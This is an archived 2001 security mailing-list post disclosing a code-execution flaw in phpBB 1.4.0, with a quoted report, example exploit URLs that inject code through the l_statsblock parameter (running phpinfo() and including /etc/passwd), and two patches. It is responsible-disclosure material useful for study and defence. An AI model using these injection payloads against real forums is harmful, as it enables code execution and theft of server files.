Hi all, This is regarding a phpBB security hole found some months ago. Since this one came out, and the other ( beeing a lot worst ) didn't, I thought it might have some interest. This aplies only to phpBB v1.4.0. ----- ----- Original Message ----- From: "UnderSpell" <underspellat_private> To: <jamesat_private> Sent: Thursday, May 17, 2001 12:15 PM Subject: Security bug in phpBB > > > His there! > > We've recente ( actually not so recently ) discover a way to run any code > using phpBB. > > The aproach was very simple : > At a given point you run a eval "eval($l_statsblock);" . > Since $l_statsblock is a language var we just have to find a way set up > us with a invalid lang file: > after login , go to user prefs and > http://hacks.phpbb.com/phpBB/prefs.php?viewemail=1&savecookie=0&sig=0&smile= 0&dishtml=0&disbbcode=0&themes=2&lang=THIS_IS_AN_INVALID_LANG_FILE&save=1&us er=&submit=Gravar+Prefer%EAncias > By this time $l_statsblock is no longer initialized so we can do funny > stuff whith them , like : > http://hacks.phpbb.com/phpBB/prefs.php?l_statsblock=phpinfo(); > or > http://hacks.phpbb.com/phpBB/prefs.php?teste=/etc/passwd&l_statsblock=includ e($teste); > and so on ... we only check the phpinfo against hack forum and the second > against my production and stagging boards. > > You have tow ways to fix this : > > 1 ) Check if lang file exists ( when tries to include ) > > --- phpBB-1.4.0/auth.php Wed Apr 25 05:47:59 2001 > +++ phpBB/auth.php Thu May 17 12:11:01 2001 > @@ -273,16 +273,19 @@ > // Include the appropriate language file. > if(!strstr($PHP_SELF, "admin")) > { > - include('language/lang_'.$default_lang.'.'.$phpEx); > + $langfile = 'language/lang_'.$default_lang.'.'.$phpEx; > } > else > { > if(strstr($PHP_SELF, "topicadmin")) { > - include('language/lang_'.$default_lang.'.'.$phpEx); > - } else { > - include('../language/lang_'.$default_lang.'.'.$phpEx); > - } > + $langfile ='language/lang_'.$default_lang.'.'.$phpEx; > + } else { > + $langfile = '../language/lang_'.$default_lang.'.'.$phpEx; > + } > } > + > + if ( ! file_exists($langfile) ) { die("Invalid Language");} > + else { include($langfile); } > > // See if translated pictures are available.. > $header_image = get_translated_file($header_image); > > > // See if translated pictures are available.. > $header_image = get_translated_file($header_image); > > 2 ) Initialize $l_statsblock before trying to include ( prefered ) > > --- phpBB-1.4.0/auth.php Wed Apr 25 05:47:59 2001 > +++ phpBB/auth.php Thu May 17 11:39:33 2001 > @@ -269,6 +269,7 @@ > // set vars for all scripts > $now_time = time(); > $last_visit = $temptime; > +$l_statsblock = ''; > > // Include the appropriate language file. > if(!strstr($PHP_SELF, "admin")) > > > > Credits for this should go for tharbadat_private and UnderSpellat_private . > > (A)UnderSpell > --- ----- Original Message ----- From: <kill-9at_private> To: <bugtraqat_private> Sent: Friday, August 03, 2001 8:51 PM Subject: phpBB 1.4.0 bug leads to easy admin privileges > -New phpBB 1.4.x exploit > phpBB, is an open source bulletin board created by > the > phpBB group. Version 1.4.x of phpBB has a variable > input > validation problem that can lead to limited arbitrary sql > querys including gaining administrative access to the > board. (...) Best regards, Joao Gouveia -------------- tharbadat_private
This archive was generated by hypermail 2b30 : Mon Aug 06 2001 - 02:36:23 PDT